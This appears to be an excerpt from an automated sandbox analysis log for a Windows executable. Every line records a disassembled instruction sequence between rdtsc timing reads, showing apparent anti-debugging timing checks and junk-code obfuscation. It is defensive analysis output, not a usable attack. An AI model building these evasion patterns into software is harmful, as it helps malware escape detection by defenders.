Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8A6F second address: 10F8A81 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F83ACDAA9E6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8A81 second address: 10F8A87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8A87 second address: 10F8A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8A8F second address: 10F8A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8A93 second address: 10F8A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8A97 second address: 10F8AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8D53 second address: 10F8D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jnp 00007F83ACDAA9E6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8D68 second address: 10F8D9B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F83ACE24F26h 0x00000008 jmp 00007F83ACE24F38h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F83ACE24F2Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8D9B second address: 10F8DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8DA4 second address: 10F8DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8DA8 second address: 10F8DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8DAC second address: 10F8DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F83ACE24F26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8DBA second address: 10F8DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10FE223 second address: 10FE229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10FE229 second address: 10FE22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10C890C second address: 10C8915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10C8915 second address: 10C891B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10C891B second address: 10C896B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F39h 0x00000007 jmp 00007F83ACE24F34h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F83ACE24F38h 0x00000013 popad 0x00000014 push ecx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10C896B second address: 10C8973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110061D second address: 1100621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1100784 second address: 110078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1100894 second address: 1100899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1104E82 second address: 1104E91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F83ACDAAA02h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1104E91 second address: 1104EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACE24F36h 0x00000009 js 00007F83ACE24F2Ch 0x0000000f jne 00007F83ACE24F26h 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007F83ACE24F26h 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1104EC1 second address: 1104EE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F83ACDAA9F6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1104EE1 second address: 1104EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110437D second address: 1104393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F83ACDAA9E6h 0x0000000a popad 0x0000000b pop eax 0x0000000c jp 00007F83ACDAAA34h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1104393 second address: 1104397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1104397 second address: 11043C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F1h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F83ACDAA9E6h 0x00000013 jmp 00007F83ACDAA9F1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1104505 second address: 1104509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1104509 second address: 110450D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110450D second address: 1104513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1104513 second address: 110452B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F83ACDAA9F1h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11047B2 second address: 11047B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11047B6 second address: 11047D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F83ACDAA9EAh 0x0000000d jg 00007F83ACDAA9ECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1104A6B second address: 1104A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 jo 00007F83ACE24F26h 0x0000000d jng 00007F83ACE24F26h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11062D2 second address: 11062E0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F83ACDAA9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11063C8 second address: 11063DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACE24F32h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11066D3 second address: 11066D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1106D0C second address: 1106D1E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F83ACE24F28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1106D1E second address: 1106D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F83ACDAA9ECh 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F83ACDAA9E8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a stc 0x0000002b pushad 0x0000002c jmp 00007F83ACDAA9F5h 0x00000031 stc 0x00000032 popad 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F83ACDAA9E8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f and esi, 6710B4A7h 0x00000055 or edi, dword ptr [ebp+122D3B13h] 0x0000005b xchg eax, ebx 0x0000005c pushad 0x0000005d push ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1106D9F second address: 1106DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1106DB1 second address: 1106DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1107649 second address: 110764D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1109090 second address: 1109096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1109096 second address: 11090DA instructions: 0x00000000 rdtsc 0x00000002 je 00007F83ACE24F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F83ACE24F28h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov di, ax 0x0000002c push 00000000h 0x0000002e or esi, dword ptr [ebp+122D3450h] 0x00000034 push eax 0x00000035 push ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1109ADE second address: 1109B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F83ACDAA9F6h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F83ACDAA9E8h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110A5C8 second address: 110A64F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F83ACE24F28h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D3B63h] 0x00000029 sbb si, 180Ch 0x0000002e push 00000000h 0x00000030 jmp 00007F83ACE24F38h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F83ACE24F28h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 push eax 0x00000052 pushad 0x00000053 jmp 00007F83ACE24F30h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110C64B second address: 110C677 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F83ACDAA9F1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110C677 second address: 110C67D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110C67D second address: 110C6FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F83ACDAA9E6h 0x00000009 jp 00007F83ACDAA9E6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F83ACDAA9E8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d stc 0x0000002e push 00000000h 0x00000030 mov edi, 75F4062Fh 0x00000035 jne 00007F83ACDAA9F0h 0x0000003b push 00000000h 0x0000003d pushad 0x0000003e jmp 00007F83ACDAA9F7h 0x00000043 push ecx 0x00000044 pushad 0x00000045 popad 0x00000046 pop esi 0x00000047 popad 0x00000048 cld 0x00000049 push eax 0x0000004a jng 00007F83ACDAA9F2h 0x00000050 jo 00007F83ACDAA9ECh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 110D139 second address: 110D14B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F83ACE24F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F83ACE24F2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1110698 second address: 11106AD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F83ACDAA9E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11106AD second address: 1110725 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F83ACE24F28h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F83ACE24F28h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov dword ptr [ebp+1247823Eh], ecx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F83ACE24F28h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 and ebx, 29973D1Fh 0x0000004f push 00000000h 0x00000051 pushad 0x00000052 and edi, dword ptr [ebp+122D1CCFh] 0x00000058 add cl, FFFFFF9Eh 0x0000005b popad 0x0000005c xor di, C6FAh 0x00000061 xchg eax, esi 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push ebx 0x00000067 pop ebx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1110725 second address: 111073E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 111095A second address: 1110960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1110960 second address: 1110965 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1112A24 second address: 1112A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1114B29 second address: 1114B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1113B50 second address: 1113B5A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F83ACE24F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1114B2D second address: 1114B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACDAA9F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1113B5A second address: 1113BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D34E4h], edi 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov di, bx 0x00000019 sub bh, 00000048h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov di, bx 0x00000026 mov eax, dword ptr [ebp+122D05C9h] 0x0000002c mov edi, dword ptr [ebp+1247057Eh] 0x00000032 push FFFFFFFFh 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F83ACE24F28h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1113BB3 second address: 1113BCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1113BCC second address: 1113C01 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F83ACE24F2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F83ACE24F2Eh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F83ACE24F2Fh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1114CAF second address: 1114CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1114CB3 second address: 1114CC5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1116911 second address: 1116916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1116916 second address: 111696B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F83ACE24F28h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 cld 0x00000025 push 00000000h 0x00000027 mov dword ptr [ebp+122D35F0h], esi 0x0000002d push 00000000h 0x0000002f mov di, si 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 push ecx 0x00000037 pop ecx 0x00000038 pop edi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1117A2F second address: 1117A35 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1117A35 second address: 1117AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a or ebx, dword ptr [ebp+122D3B43h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F83ACE24F28h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c pushad 0x0000002d xor ebx, dword ptr [ebp+122D3B37h] 0x00000033 popad 0x00000034 push 00000000h 0x00000036 jmp 00007F83ACE24F2Bh 0x0000003b xchg eax, esi 0x0000003c jmp 00007F83ACE24F2Ch 0x00000041 push eax 0x00000042 jng 00007F83ACE24F4Bh 0x00000048 push eax 0x00000049 push edx 0x0000004a jp 00007F83ACE24F26h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1119AF6 second address: 1119B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F83ACDAA9E6h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1117D20 second address: 1117D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1117D24 second address: 1117D2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
